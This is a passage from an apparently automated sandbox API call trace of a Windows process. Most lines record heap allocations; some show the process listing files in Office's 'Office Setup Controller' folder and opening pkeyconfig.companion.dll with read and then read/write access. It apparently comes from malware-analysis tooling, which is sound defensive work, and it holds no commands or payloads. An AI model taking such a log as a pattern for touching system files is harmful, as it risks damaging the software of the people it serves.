hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0086.927] AreFileApisANSI () returned 1 [0086.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0086.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0086.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0086.928] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xda982389, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x902bb)) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.928] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0086.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0086.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88b60 [0086.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b60 | out: hHeap=0x20000) returned 1 [0086.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.929] AreFileApisANSI () returned 1 [0086.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll", lpUsedDefaultChar=0x0) returned 105 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.929] AreFileApisANSI () returned 1 [0086.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0086.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0086.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0086.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.931] GetFileType (hFile=0x424) returned 0x1 [0086.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.931] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.931] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.931] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.931] CloseHandle (hObject=0x424) returned 1 [0086.932] AreFileApisANSI () returned 1 [0086.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0086.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0086.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.932] GetFileType (hFile=0x424) returned 0x1 [0086.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.932] CloseHandle (hObject=0x424) returned 1 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.934] AreFileApisANSI () returned 1 [0086.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0086.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x4ebc8 [0086.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0086.934] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.934] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xd0, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x88d38, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xd0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䣀")) returned 0 [0086.934] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0086.935] RtlAllocateHeap (HeapHandle=0x20000, 